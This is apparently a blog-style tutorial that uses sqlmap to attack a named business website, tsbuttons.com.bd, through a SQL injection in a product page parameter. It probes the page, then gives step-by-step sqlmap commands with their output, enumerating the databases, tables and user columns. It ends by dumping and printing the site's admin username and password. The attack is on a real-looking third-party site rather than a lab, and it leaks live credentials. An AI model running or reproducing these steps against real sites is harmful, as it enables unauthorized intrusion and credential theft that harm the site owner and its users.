SQLMAP-->
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
first search the vulnerability into the target website.
target-->
www.tsbuttons.com.bd
now find the sql injection vulnerability into target website
ohh I found it....
vulnerability-->
tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'
this is the error on website
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''' at
line 1
---------------------------------------------
now start the Game ( hack the target site )
1.open the sqlmap
root@kali:~# sqlmap --help
2.find out the database name of the target website
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs
output is
----------------------------------------
available databases [2]:
[*] information_schema
[*]
tsbutton_db
---------------------------------------
3.access the tables of database
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables
output is
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database:
tsbutton_db
[4 tables]
+------------------------+
| news |
| product |
| product_type |
|
users |
+------------------------+
---------------------------------------------------------------------------------------------------------
4.now it time to access the columns of tables which are we fetch from databse
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns
output is
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+--------------------+----------------------+
| Column | Type |
+-------------------+-----------------------+
| name | varchar(25) |
|
Password | varchar(255) |
| type | int(4) |
| userid | int(25) |
|
username | varchar(25) |
+------------------+-----------------------+
-------------------------------------------------------
5.access the user name
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump
yehh
we get the user name of the target website
username-->admin
6.Lets access the password
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump
finally Game is over
--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------